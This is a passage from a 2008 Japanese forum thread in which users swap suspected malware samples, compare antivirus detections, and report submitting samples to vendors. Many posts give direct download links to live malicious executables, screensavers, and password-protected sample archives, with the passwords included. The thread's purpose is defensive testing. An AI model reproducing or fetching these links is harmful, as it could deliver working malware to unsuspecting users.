スマン
ファイル間違ってて解凍パス抜けにつき上げ直しました

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=71
パス:virus

ついでに砂箱内でちょっと遊んでみたログ
あきらかにあやしいんだけど検出できるソフトある?
Sep 1 21:50:58 a[1844,0]: fs Deny -----X File: C:\Program Files\Internet Explorer\IEXPLORE.EXE
Sep 1 21:51:02 a[1844,0]: fs Deny -----X File: D:\prg\rulesPlayer\ddeopener.exe %TEMP%\ss-enkoppv-2012.wmv
Sep 1 21:51:05 a[1844,0]: fs Allow -RWC-- File: %TEMP%\KB926239.exe
Sep 1 21:51:05 a[1844,0]: fs Deny -----X File: %TEMP%\KB926239.exe
Sep 1 21:51:07 a[1844,0]: fs Allow -RWC-- File: %TEMP%\KB951748.exe
Sep 1 21:51:07 a[1844,0]: fs Deny -----X File: %TEMP%\KB951748.exe


333 :名無しさん@お腹いっぱい。:2008/09/01(月) 22:08:04
>>332
解凍したものをVirustotalスキャン
http://www.virustotal.com/jp/analisis/af2dbc2acb1eedeb6d86ae3b296b9136

334 :名無しさん@お腹いっぱい。:2008/09/01(月) 22:22:24
nyとかで出回ってる奴だろ
ダウソ板でやってくれ

335 :名無しさん@お腹いっぱい。:2008/09/01(月) 22:24:14
援交ppvってw

336 :名無しさん@お腹いっぱい。:2008/09/02(火) 00:11:59
http://www5.uploader.jp/dl/tane/tane_uljp00081.zip.html
解凍パス:infected
DLパス:Virus

http://www.virustotal.com/jp/analisis/eb94bfa82383e0825df1c0bfd7b3f9eb

337 :名無しさん@お腹いっぱい。:2008/09/02(火) 13:54:22
Microsoftに検体投げてる人、MMPCからアンケートメール来てね?

338 :名無しさん@お腹いっぱい。:2008/09/02(火) 23:34:18
http://www.cyokinde.com/ffxishowvide/16498897649.rar

339 :名無しさん@お腹いっぱい。:2008/09/02(火) 23:46:21
>>338
http://www.virustotal.com/analisis/4bb09e7c24d0adf67d2cc9a3e1465fe4

340 :名無しさん@お腹いっぱい。:2008/09/03(水) 01:10:05
ie.exeとffxi.exeと2匹落とすのね。自己解凍ファイルをUpackしてある。

341 :名無しさん@お腹いっぱい。:2008/09/03(水) 11:11:58
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=72
pass:virus
http://www.virustotal.com/jp/analisis/0a5a05d56f7c3c8d6257396277449e80

342 :名無しさん@お腹いっぱい。:2008/09/03(水) 23:08:34
>>341
カスペ対応済み
Trojan-Downloader.Win32.Zlob.xtt setup.exe
12:48捕獲、16:56シグネチャリリース

http://www.virustotal.com/analisis/caf00755618794c99a82c5b326c0bab7

343 :名無しさん@お腹いっぱい。:2008/09/03(水) 23:18:06
Symantecも即日対応してるな。
SRIテストでも地味ながらも上昇してるしSymantecのウイルス対応速度向上は本物のようだな。

去年までのSymantecはここで検体提出してもいつになったら対応するのやら・・・という検体の方が多かったが。

344 :名無しさん@お腹いっぱい。:2008/09/04(木) 00:23:56
http://pc11.2ch.net/test/read.cgi/sec/1140517079/932
あやしいファイルを実行するスレ


ttp://home.no/adobephotoshop/Project1.zip

http://www.virustotal.com/analisis/b407ffc2a4d63ad0cc6417b93edfe161



345 :名無しさん@お腹いっぱい。:2008/09/04(木) 00:25:38
AntiVirとAVG以外の主要ベンダーは全滅か。
McAfeeが検出してるのが意外な気がするけど。

346 :名無しさん@お腹いっぱい。:2008/09/04(木) 01:03:26
AntiVirのはPackerだと言ってるだけだから提出したほうがいいと思う

347 :名無しさん@お腹いっぱい。:2008/09/04(木) 01:27:23
割れ厨が毒餌食っただけか。提出やめるわ

348 :名無しさん@お腹いっぱい。:2008/09/04(木) 01:47:51
Virustotalに参戦したのはいいけど案の定スルーしまくりで大恥晒してるK7って何がしたいの?

349 :名無しさん@お腹いっぱい。:2008/09/04(木) 02:28:31
>>344
うちのAntiVirは検出しない??
Search Engine V8.01.01.28 2008/09/02
Virus Definition file V7.00.06.111 2008/09/03

350 :名無しさん@お腹いっぱい。:2008/09/04(木) 02:33:40
AntiVirってまれにそういう現象あるよ。
ちなみにうちのはしっかりと検出する。

351 :名無しさん@お腹いっぱい。:2008/09/04(木) 02:59:36
>>350
えぇっ〜
検出力高くてもそういう現象おきるなら
あんまり信用できないですね orz

352 :名無しさん@お腹いっぱい。:2008/09/04(木) 07:19:10
ただPackerをスルーする設定だったとか?(そんな設定あるのか知らないけど)

353 :名無しさん@お腹いっぱい。:2008/09/04(木) 09:50:51
>>349
Win32 file heuristicをHigh detection levelに設定しる
インスコ時は一箇所で設定できるけど、オプションだとScannerとGuardの二箇所だから注意な

運千葉スレの初心者ならともかく、このスレ住人なら最大検出設定にするだろ常考…
とか言いつつ、俺も運千葉使い始めた頃にハマったけどなw

354 :名無しさん@お腹いっぱい。:2008/09/04(木) 14:51:16
ウイルスによる書き込み対策スレ
http://changi.2ch.net/test/read.cgi/download/1220292628/

355 :名無しさん@お腹いっぱい。:2008/09/04(木) 14:58:11
ウイルスによる書き込み対策スレ
http://changi.2ch.net/test/read.cgi/download/1220292628/1

1 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2008/09/02(火) 03:10:28 ID:AU+dFCo40
468 名前:Akihisa 投稿日:2008/09/02(火) 02:31:44 ID:oYC0jkiT0
ほらほら、どっからでもかかってくるおwwwwwww

348 名前:Akihisa 投稿日:2008/09/02(火) 02:49:47 ID:oYC0jkiT0
ここでオナニーしていいですか


349 名前:Akihisa 投稿日:2008/09/02(火) 02:52:44 ID:oYC0jkiT0
ここはお前の日記帳じゃないだろ・・・常識的に考えて


356 :名無しさん@お腹いっぱい。:2008/09/04(木) 23:03:23
>>353
ありがd
Highにしたらちゃんと検出できました m(_)m

357 :名無しさん@お腹いっぱい。:2008/09/05(金) 00:48:39
>>344

d

カスペ、スルーにつき、一応検体提出。
>>3が気になるが…)

358 :名無しさん@お腹いっぱい。:2008/09/05(金) 01:08:36
>>344
一応AntiVirとAVGに送った

359 :名無しさん@お腹いっぱい。:2008/09/05(金) 20:28:47
http://game13-2ch.2288.org/gourmet/080803.rar

360 :名無しさん@お腹いっぱい。:2008/09/05(金) 20:34:55
http://google.netcdn.com/cao/cao.exe

361 :名無しさん@お腹いっぱい。:2008/09/05(金) 20:50:31
>>359
http://www.virustotal.com/analisis/371192a69a3cf5761b41401227d5a97f
>>360
http://www.virustotal.com/analisis/b958e6b1142d7395d02cade969749fd6

362 :358:2008/09/05(金) 23:33:30
>>344
AntiVirからFALSE POSITIVEとの回答がきた
AVGはまだきてない

363 :名無しさん@お腹いっぱい。:2008/09/05(金) 23:34:44
今日捕まえたマルウェア32種類(主にバックドア)のVirustotal.com結果

AntiVir   検出数11 (未検出21)
AVG     検出数10 (未検出22)
Kaspersky 検出数6 (未検出26)
Norton   検出数6 (未検出26)

364 :名無しさん@お腹いっぱい。:2008/09/05(金) 23:41:36
>>363
Packer捕獲をするベンダーとしないベンダの差なのかな?
avast!、BitDefender、バスターはどうだろ?
あとマカフィーとNODも。

365 :名無しさん@お腹いっぱい。:2008/09/06(土) 17:56:53
>>360
なんか初めてVTですべてのベンダーが検出ウイルスを見た気がしますw

366 :357:2008/09/07(日) 00:33:23
>>344

カスペから返事ようやくきた。

Hello,

Project1.exe_

No malicious code was found in this file.

Please quote all when answering.

--
Best regards, Evgeny Aseev
Virus analyst, Kaspersky Lab

>>362のAntiVirとあわせると、白か。

367 :名無しさん@お腹いっぱい。:2008/09/08(月) 06:26:45
検知力テスト(2008年9月07日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/
Rank Detects Missed Product
1st 97% 90 AntiVir
2nd 96% 101 Webwasher-Gateway
3rd 94% 167 Ikarus
4th 93% 205 BitDefender
5th 92% 253 AVG
6th 91% 266 F-Secure
7th 89% 346 Avast
8th 89% 359 Sophos
9th 88% 365 Norman
10th 85% 478 ClamAV
11th 85% 481 Kaspersky
12th 84% 502 Microsoft
13th 84% 504 CAT-QuickHeal
14th 83% 538 VirusBuster
15th 82% 559 DrWeb
16th 80% 640 Rising
17th 80% 647 Fortinet
18th 80% 648 F-Prot
19th 79% 665 Symantec
20th 79% 677 eTrust-Vet
21st 76% 765 TheHacker
22nd 73% 869 McAfee
23rd 73% 871 VBA32
24th 73% 875 AhnLab-V3
25th 72% 915 Panda
26th 71% 929 Authentium
27th 69% 997 NOD27w
28th 47% 1712 TrendMicro

368 : ◆W32/Vael.o :2008/09/08(月) 18:43:05
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=74
Malware-Pack40

369 :名無しさん@お腹いっぱい。:2008/09/08(月) 19:45:40
>>368 AVG提出しました!乙です

370 :名無しさん@お腹いっぱい。:2008/09/08(月) 20:24:49
>>368
Rising Antivirus 20.61.02
7\despacho_artigo8755151.scr: Suspicious.Trojan.Win32.VBDownLoader.a

371 :名無しさん@お腹いっぱい。:2008/09/08(月) 21:17:09
>>368
d

カスペ2009 17:47:00

9/12(0,1,4,5,6,7,8,9,a)

Detected Trojan program Trojan-Downloader.JS.Timul.dd 0/ggbbyahoo.html
Detected Trojan program Trojan-Downloader.Win32.Delf.gff 5/dwbins.exe
Detected Trojan program Trojan-Downloader.Win32.FraudLoad.vbpu 6/setup.ver1_1000.0_.exe
Detected Trojan program Trojan-Downloader.Win32.VB.hkw 7/despacho_artigo8755151.scr
Detected Trojan program Backdoor.Win32.SdBot.gxk 8/madonna.exe
Detected Trojan program Trojan-Downloader.Win32.Dadobra.bfu 9/abrir-4377473-47374343-3.exe
Detected riskware not-a-virus:FraudTool.Win32.Devushka.b 1/ss_install.exe
Detected riskware not-a-virus:FraudTool.Win32.Agent.bs 4/ASE_Setup_Free.exe
Detected riskware not-a-virus:FraudTool.Win32.SpyDevastator.b a/spydevastator_v1_32_install.exe//data0008
Detected riskware not-a-virus:FraudTool.Win32.SpyDevastator.a a/spydevastator_v1_32_install.exe//data0013

検体提出します。(2,3,b)

372 :名無しさん@お腹いっぱい。:2008/09/08(月) 21:33:10
>>368
NIS2008で5/12 (4、6、7、8、9)
未検出は贈っておきました

373 :名無しさん@お腹いっぱい。:2008/09/08(月) 21:49:14
>>368
K7AntiVirus 9.5.0540
1/12
\Malware\4,ASE_Setup_Free.exe,Infected by Trojan.Win32.Malware.1,Cleaned ,

374 :名無しさん@お腹いっぱい。:2008/09/08(月) 23:23:14
>>368
NOD32

3/12

Malware\4\ASE_Setup_Free.exe - Win32/Adware.AntiSpywareExpert アプリケーション
Malware\6\setup.ver1_1000.0_.exe - Win32/Adware.Antivirus2008 アプリケーション
Malware\9\abrir-4377473-47374343-3.exe - 新種・未知のNewHeur_PEである可能性 ウイルス

375 :名無しさん@お腹いっぱい。:2008/09/09(火) 03:38:15
検知力テスト(2008年9月08日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/
Rank Detects Missed Product
1st 97% 90 AntiVir
2nd 96% 101 Webwasher-Gateway
3rd 94% 167 Ikarus
4th 93% 205 BitDefender
5th 92% 253 AVG
6th 91% 265 F-Secure
7th 89% 346 Avast
8th 89% 359 Sophos
9th 88% 364 Norman
10th 85% 478 ClamAV
11th 85% 481 Kaspersky
12th 84% 502 Microsoft
13th 84% 503 CAT-QuickHeal
14th 83% 538 VirusBuster
15th 82% 559 DrWeb
16th 80% 639 Rising
17th 80% 646 Fortinet
18th 80% 648 F-Prot
19th 79% 665 Symantec
20th 79% 677 eTrust-Vet
21st 76% 763 TheHacker
22nd 73% 869 McAfee
23rd 73% 869 VBA32
24th 73% 875 AhnLab-V3
25th 71% 915 Panda
26th 71% 928 Authentium
27th 69% 997 NOD27w
28th 47% 1704 TrendMicro

376 :名無しさん@お腹いっぱい。:2008/09/09(火) 12:00:07
カスペが贔屓だが、こりゃすっかりマークされてるんだろうかな
やっぱどうにかして併用かねー。

377 :名無しさん@お腹いっぱい。:2008/09/09(火) 12:35:23
ウイルスバスター2008
1/12
5 TROJ_DLOADER.VTA
提出しときます


378 :名無しさん@お腹いっぱい。:2008/09/09(火) 12:39:43
UDしたら6番も検出しました。
TROJ_FAKEAV.LD

379 :名無しさん@お腹いっぱい。:2008/09/09(火) 15:06:36
>>376
多分10/12が正解だからカスペは健闘してる
まさかSRIの捏造テストの話じゃないよな

380 :名無しさん@お腹いっぱい。:2008/09/09(火) 17:24:10
570 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2008/09/09(火) 15:48:02
今来たメールに添付されてたやつ
やっぱり検出しないね
http://www.virustotal.com/analisis/72707cde2703b00189aeed3f7ccb89c2
http://www.virustotal.com/analisis/60570a5400a8c0b377ed75041a267d7c

381 :名無しさん@お腹いっぱい。:2008/09/09(火) 17:32:41
>>380
成績の悪いアンチウイルス業者のアラシだな
http://pc11.2ch.net/test/read.cgi/sec/1220338514/570-571

382 :名無しさん@お腹いっぱい。:2008/09/09(火) 17:33:43
ttp://netra.lpru.ac.th/~phsakong/Virus/

383 :名無しさん@お腹いっぱい。:2008/09/09(火) 18:03:27
>>381
アラシっておまえ基地外だろ

384 :名無しさん@お腹いっぱい。:2008/09/10(水) 23:37:36
>>371
カスペからの返事

Free-SpyWareScan.exe,fooware.exe は無害
もう一つ返事待ちだけれど、無害っぽい。

385 :名無しさん@お腹いっぱい。:2008/09/11(木) 05:54:22
検知力テスト(2008年9月10日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/
Rank Detects Missed Product
1st 97% 90 AntiVir
2nd 96% 101 Webwasher-Gateway
3rd 94% 167 Ikarus
4th 93% 205 BitDefender
5th 92% 252 AVG
6th 91% 261 F-Secure
7th 89% 344 Avast
8th 89% 357 Sophos
9th 88% 361 Norman
10th 85% 477 ClamAV
11th 85% 481 Kaspersky
12th 84% 501 Microsoft
13th 84% 501 CAT-QuickHeal
14th 83% 536 VirusBuster
15th 82% 557 DrWeb
16th 80% 635 Rising
17th 80% 644 Fortinet
18th 80% 647 F-Prot
19th 79% 662 Symantec
20th 79% 674 eTrust-Vet
21st 76% 761 TheHacker
22nd 73% 866 VBA32
23rd 73% 868 McAfee
24th 73% 873 AhnLab-V3
25th 71% 913 Panda
26th 71% 926 Authentium
27th 69% 994 NOD27w
28th 47% 1692 TrendMicro

386 :名無しさん@お腹いっぱい。:2008/09/11(木) 12:28:24
ttp://www.gamesrb.com/rbv/uu.exe

387 :名無しさん@お腹いっぱい。:2008/09/11(木) 12:57:07
>>386
>>3
Requested URL:  http://www.gamesrb.com/rbv/uu.exe
Information: Is the TR/Crypt.XPACK.Gen Trojan

388 :名無しさん@お腹いっぱい。:2008/09/12(金) 15:54:31
>>382
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=75
抜き出しておいたよ。
AVGで反応したのは除外してあるのと暇な人AVGに送ってくれ。
なんか疲れた

389 :名無しさん@お腹いっぱい。:2008/09/12(金) 18:09:42
ttp:// 71.6.194. 213:8080/RO/MKJ6.scr
ttp:// 71.6.194. 213:8080/file/mpg.scr


MKJ6.scr
http://www.virustotal.com/analisis/989843b41efccb1a2c2f996c61d0214f
mpg.scr
http://www.virustotal.com/analisis/9426cc5ede9d3e702a751c1aff9693ed
シマンテックには送付済み

390 :名無しさん@お腹いっぱい。:2008/09/13(土) 22:18:31
>>388
d
(でも。14.4MBって、orz 割れ?)
DLパスワード=解凍パスワード="virus"


カスペ2009


3/29

Detected riskware not-a-virus:FraudTool.Win32.SpyNoMore.ai tane0075.zip/Download_wintasksprotrial2.exe
Detected Trojan program Trojan.Win32.StartPage.cto tane0075.zip/killVBS.vbs_killer.exe//UPX
Detected Trojan program Trojan.Win32.StartPage.ayh tane0075.zip/Anti_Hacked_By_Godzilla.exe//UPX


一応、検体提出します。

391 :390:2008/09/14(日) 00:24:54
>>388
カスペからの返事・途中経過

Hello,

AntiNimd.exe_, ANTIVDO.exe_, BrontokKiller.exe_, cs_expl.exe_, data_exe_killer.exe_, FixWelch.exe_, HijackThis.exe_, Killer.exe_, killer.exe_1, KillGodzilla4.exe_, MSN_Worm_Remover.exe_, procexp.exe_,Toy_killer.exe_

No malicious code were found in these files.(悪意のあるコードなし)

KlAntiFL.exe_

This file is in process.(このファイルは解析中)

Please quote all when answering.

--
Best regards, Vyacheslav Zakorzhevsky
Virus analyst, Kaspersky Lab.

結果 3/29(提出26中、13白、13回答待ち)

392 :名無しさん@お腹いっぱい。:2008/09/14(日) 06:04:07
検知力テスト(2008年9月13日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/
Rank Detects Missed Product
1st 97% 93 AntiVir
2nd 96% 102 Webwasher-Gateway
3rd 94% 170 Ikarus
4th 93% 210 BitDefender
5th 92% 255 AVG
6th 91% 272 F-Secure
7th 89% 341 Sophos
8th 89% 352 Avast
9th 88% 364 Norman
10th 85% 473 ClamAV
11th 85% 484 Kaspersky
12th 84% 501 CAT-QuickHeal
13th 84% 504 Microsoft
14th 83% 538 VirusBuster
15th 82% 559 DrWeb
16th 80% 630 Fortinet
17th 79% 647 F-Prot
18th 79% 647 Rising
19th 79% 658 Symantec
20th 79% 662 eTrust-Vet
21st 76% 762 TheHacker
22nd 74% 840 McAfee
23rd 72% 873 VBA32
24th 72% 873 AhnLab-V3
25th 72% 897 Authentium
26th 72% 901 Panda
27th 69% 970 NOD27w
28th 49% 1630 TrendMicro

393 :390:2008/09/14(日) 22:41:33
カスペ2009
>>388追加検出

Detected Trojan program Trojan-Downloader.Win32.Agent.aggo Monaliza_killer.exe//UPX
Detected Trojan program Trojan-Downloader.Win32.Agent.aggq RUNDLL64.dll.vbs_killer.exe//UPX

送りすぎて渋滞中。

結果 5/29(提出26中、2黒、13白、11回答待ち)

394 :390:2008/09/15(月) 17:26:45
>>388 カスペからの返事まとめ

AdobeR_Killer.exe_, SXS_Killer.exe_, CLRAV.COM_, COMDLG32.OCX_, CPE17AntiAutorun119.exe_, Fix_SVCHOST100_.exe_, Fix_SVCHOST100_25.exe, KillGodzilla.exe_,spyeraserplb.exe_

No malicious code were found in these files.

結果 5/29(提出26中、2黒、22白、2回答待ち)

395 :名無しさん@お腹いっぱい。:2008/09/16(火) 23:52:04
>>368
これNIS2009でなにも反応しないけど何で?

396 :名無しさん@お腹いっぱい。:2008/09/17(水) 00:44:34
>>395
ちゃんと解凍した?

397 :名無しさん@お腹いっぱい。:2008/09/17(水) 01:02:43
>>395
素人さんが手を出すととんでもない事になりかねんぞ

398 : ◆W32/Vael.o :2008/09/17(水) 15:51:59
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=77
Malware-Pack41

399 :名無しさん@お腹いっぱい。:2008/09/17(水) 16:12:45
>>398
Avira AntiVir
TR/BHO.gsz [trojan] Malware\1\AdobeFlashPlayerUpdate.exe
BDS/Small.cij.12 [backdoor] Malware\2\montagens.fotos.scr
DR/FakeAlert.PH [dropper] Malware\3\TotalSecure2009.exe
TR/Dldr.FraudLoad.vcae [trojan] Malware\4\setup.ver1_1000.0_.exe
HTML/Rce.Gen [virus] Malware\6\pdf.pdf
TR/Drop.Agent.wrk [trojan] Malware\8\e-card.exe
TR/Dldr.Banload.vnr [trojan] Malware\7\fotos.exe
TR/Multis.GX [trojan] Malware\a\antivirus.v.1.exe
TR/Drop.BYFH.99878 [trojan] Malware\b\SoftwareSetup.exe
0,5,9提出しときます

400 :名無しさん@お腹いっぱい。:2008/09/17(水) 16:23:29
>>398
バスター2009
5/12 (2,4,6,8,a)
残り提出しときます。

それにしても検出できたの偶数ばっかw

401 :名無しさん@お腹いっぱい。:2008/09/17(水) 17:33:32
>>398
NIS2009で 7/12 (1、3、4、5、6、8、a)
未検出は贈っておきました

402 :名無しさん@お腹いっぱい。:2008/09/17(水) 17:34:21
>>398
0 http://www.virustotal.com/analisis/621f8936ec9b01ab90ade661f270a376
1 http://www.virustotal.com/analisis/8ea62572acd7e417dd5a88a8b8e44060
2 http://www.virustotal.com/analisis/2df775361181f733c1664ef483e7b88f
3 http://www.virustotal.com/analisis/58d6b13b260a71e6598a9c1d193eb7b2
4 http://www.virustotal.com/analisis/5c1423be285a42cd7c368fdee25e1fd2
5 http://www.virustotal.com/analisis/095e87e0aae1029eb9c4c5700f26f9b0
6 http://www.virustotal.com/analisis/f6a057005cfc99fdf2e0e04e277cdfa4
7 http://www.virustotal.com/analisis/32aea558475799e948fc473464f5557e
8 http://www.virustotal.com/analisis/f8d0adf0e8cc5fc6f64880abf833104a
9 http://www.virustotal.com/analisis/22013ac75e661adc1ac9106e24a04ad5
a http://www.virustotal.com/analisis/470eb87ef6d2db5e5e73a72ebfa72fa6
b http://www.virustotal.com/analisis/44cb9d44c632a698185294fe1087b3ef

403 :401:2008/09/17(水) 17:47:50
>>402
アレ? 7も検出してるね
Auto Protect検出だけでなくて
残ったファイルをフォルダごと手動スキャンすればよかったのかな?

404 :F-Secure2009:2008/09/17(水) 17:53:05
1-4-6-7-8-9-a撃墜 6/11

2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\1\AdobeFlashPlayerUpdate.exe に不正なコードを検知しました。 
感染: Trojan.Win32.BHO.gsz 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\4\setup.ver1_1000.0_.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.FraudLoad.vcae 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\6\pdf.pdf に不正なコードを検知しました。 
感染: Exploit.Win32.Pidief.gp 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\7\fotos.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Banload.vnr 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\8\e-card.exe に不正なコードを検知しました。 
感染: Trojan-Dropper:W32/Agent.FDY 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\9\ver_postal.com に不正なコードを検知しました。 
感染: Worm:W32/Agent.BUC 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\a\antivirus.v.1.exe に不正なコードを検知しました。 
感染: Trojan.Win32.Multis.gx 
処理: ファイルを削除しました。 


405 :名無しさん@お腹いっぱい。:2008/09/17(水) 18:19:14
>>403
NIS2009とVTで使われてるので検索エンジンが違うからじゃない?


406 :F-Secure2009:2008/09/17(水) 18:21:37
>>404訂正
1-4-6-7-8-9-a撃墜 7/11




407 :403:2008/09/17(水) 18:28:27
>>405
どうもそうらしい
再手動スキャンでも7は未検出でした

408 :名無しさん@お腹いっぱい。:2008/09/17(水) 18:32:22
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=78
解凍パス:infected
DLパス:virus

409 :名無しさん@お腹いっぱい。:2008/09/17(水) 18:33:08
>>408
He_138811
http://www.virustotal.com/jp/analisis/10ada89c1891cc25d270c36652e495f4

0001.exe
http://www.virustotal.com/jp/analisis/6dceb21cc09883aad237aa7110ca38dc

keikei_uljp00122.exe
http://www.virustotal.com/jp/analisis/84ff69772e1216738aec7daf6805f2fe


410 :F-Secure2009:2008/09/17(水) 19:32:36
>406 :F-Secure2009 :2008/09/17(水) 18:21:37 
時点で検体送るもまだ対応されず



411 :名無しさん@お腹いっぱい。:2008/09/17(水) 19:47:00
Rising Antivirus 2009 21.01.21 (20.63.05.00)
>>398
2\montagens.fotos.scr: Suspicious.Trojan.Win32.VBDownLoader.a
>>408
スルー

412 :名無しさん@お腹いっぱい。:2008/09/17(水) 21:37:38
>>398
d
カスペ2009@ 20:02:00
7/12

Detected Trojan program Trojan.Win32.BHO.gsz tane0077.zip/Malware/1/AdobeFlashPlayerUpdate.exe
Detected Trojan program Trojan-Downloader.Win32.FraudLoad.vcae tane0077.zip/Malware/4/setup.ver1_1000.0_.exe
Detected Trojan program Exploit.Win32.Pidief.gp tane0077.zip/Malware/6/pdf.pdf
Detected Trojan program Trojan-Downloader.Win32.Banload.vnr tane0077.zip/Malware/7/fotos.exe
Detected Trojan program Trojan-Dropper.Win32.Agent.wrk tane0077.zip/Malware/8/e-card.exe
Detected Trojan program Trojan.Win32.Qhost.klm tane0077.zip/Malware/9/ver_postal.com
Detected Trojan program Trojan.Win32.Multis.gx tane0077.zip/Malware/a/antivirus.v.1.exe

1,4,6,7,8,9,a。F-Secureと同じ。
検体提出します。

>>408
0/3
これも後に検体提出します。

413 :412:2008/09/17(水) 21:45:53
>>398
ヒューリスティックで8/12だった。orz。これも一応提出。

Detected Trojan program Heur.Downloader Malware/2/montagens.fotos.scr

414 :名無しさん@お腹いっぱい。:2008/09/18(木) 00:59:06
今回のはやばいかもわからん
特にゼロ番はサンドボックス超えていったぞw



415 :名無しさん@お腹いっぱい。:2008/09/18(木) 01:02:50
>>414
そんなのあるんだ

416 :名無しさん@お腹いっぱい。:2008/09/18(木) 01:47:19
>>414
0番て、Verisignのデジタル署名付きじゃないかw

417 :412:2008/09/18(木) 01:57:20
>398
カスペからの返事
一つのファイルだけorz

>>413のヒューリスティック・エンジンからシグネチャに変更(2\montagens.fotos.scr)
8/12(回答待ち4)

Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

Trojan-Downloader.Win32.VB.hto

Sincerely yours,
Andrey Bezborodov,


おまけ
>>394の回答待ち2つはClean

418 :F-Secure2009:2008/09/18(木) 09:20:19
>>398の2と3対応

419 :F-Secure2009:2008/09/18(木) 09:22:11
C:\Documents and Settings\\Malware\2\montagens.fotos.scr 
Trojan-Downloader.Win32.VB.hto (ウィルス)
C:\Documents and Settings\\Malware\3\TotalSecure2009.exe
Rogue:W32/TotalSecure.B (リスクウェア)

420 :名無しさん@お腹いっぱい。:2008/09/18(木) 16:07:25
これって解凍してからスキャンしないと検出されないんですか?

421 :名無しさん@お腹いっぱい。:2008/09/18(木) 16:15:14
パスワード付きは解凍しなきゃだめだろ常識で考えて

422 :名無しさん@お腹いっぱい。:2008/09/18(木) 17:03:53
>>420
>>397


423 :名無しさん@お腹いっぱい。:2008/09/18(木) 17:29:22
解凍する時に発動するウィルスだったらどうする?

424 :名無しさん@お腹いっぱい。:2008/09/18(木) 17:34:46
脆弱性が報告されている変な解凍ソフト使ってなければ大丈夫じゃね。

キーボードの上にものを落としたり、誤ってダブルクリックするのは問題外。でも、1スレに一人はいる。実行した!助けて!って。w

425 :名無しさん@お腹いっぱい。:2008/09/18(木) 17:51:33
参加したいんスけど具体的にはどうしたらいいんスかね?
先輩たち教えてくださいヨww

と言う輩が増えてきた
一体何が目的なのかと

426 :名無しさん@お腹いっぱい。:2008/09/18(木) 18:36:20
まあ、セキュリティ勉強するのも良いんじゃない?
【総合】サンドボックス 砂箱 sandbox
ttp://pc11.2ch.net/test/read.cgi/sec/1202282636/

427 :名無しさん@お腹いっぱい。:2008/09/18(木) 19:30:24
F-Secure Security Labs さんは書きました:
>Hello,
>
>Files that will be detected:
>TotalSecure2009.exe - Rogue:W32/TotalSecure.B
>Scan.exe - Rogue:W32/TotalSecure.B
>antispyware_setup.exe - Rogue:W32/RealAntiSpyware.A
>montagens.fotos.scr - Trojan:W32/VB.BLN
>SoftwareSetup.exe - Trojan-Downloader:W32/FraudLoad.BQ
>
>No detection needed:
>totalsecure.s3 - data file, non executable
>totalsecure.s2 - data file, non executable
>totalsecure.s6 - data file, non executable
>totalsecure.s5 - data file, non executable
>totalsecure.s4 - data file, non executable
>
>As for the file setup.exe, it contains the file ErrorRepairTool.exe we will further look into this applicartion.
>
>regards,

428 :F-Secure2009:2008/09/18(木) 19:35:32
b,5追加対応

結果: マルウェア 1 が検出されました。
Trojan-Downloader:W32/FraudLoad.BQ (ウィルス)
    * C:\Documents and Settings\\Malware\b\SoftwareSetup.exe 処理: 削除済み 

リスクウェアが見つかりました。
Rogue:W32/RealAntiSpyware.A (リスクウェア)
    * C:\Documents and Settings\\Malware\5\antispyware_setup.exe 

これで
>>398はゼロ番除いて対応

429 :名無しさん@お腹いっぱい。:2008/09/18(木) 19:39:38
>>416
じゃあ、中身は真っ黒だなベリサイン。。。>427で悩むわけだw

430 :名無しさん@お腹いっぱい。:2008/09/21(日) 11:16:03
>>423
すんげーマイナーな機能を突かれて、おかしなところに展開されたら痛いから、
砂箱内に展開するようにしては。

>>429
署名目的が、時刻証明のやつかな…。 (出先なのでブツ見れてない)

431 : ◆W32/Vael.o :2008/09/21(日) 13:27:32
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=79
Malware-Pack42

432 :名無しさん@お腹いっぱい。:2008/09/21(日) 14:28:03
>>431
NIS2009で 4/12 (0、3、8、a)
未検出は贈っておきました

433 :名無しさん@お腹いっぱい。:2008/09/21(日) 14:42:27
>>431
0. ttp://www.virustotal.com/analisis/0640f201fa422d54092e98cf4974903b
1. ttp://www.virustotal.com/analisis/c5be3ae7cfe4c96e873f8a353e6d9201
2. ttp://www.virustotal.com/analisis/5a7e49e9574f38cf9bfdcb798c9a0b50
3. ttp://www.virustotal.com/analisis/3b830fef8238e67c6501409f8ed982c8
4. ttp://www.virustotal.com/analisis/dce7161107d26df1ba1664164ea5cfba
5. ttp://www.virustotal.com/analisis/a003572f0ce0bf084508a9b26469008c
6. ttp://www.virustotal.com/analisis/fd557ebb29b3a58f3536c9fd9b1a6be6
7. ttp://www.virustotal.com/analisis/51fc1c2817ab0900ce250085709979bb
8. ttp://www.virustotal.com/analisis/ab35c38cc81bf1619ac3689c27152a21
9. ttp://www.virustotal.com/analisis/1db3d476473623b08aea48ec9a52fb19
a. ttp://www.virustotal.com/analisis/b230cc10dd99535e1535ff554cf7bf96
b. ttp://www.virustotal.com/analisis/ebb1fc3f7e3d1e879feb0513a810e749

434 :名無しさん@お腹いっぱい。:2008/09/21(日) 14:46:27
>>431

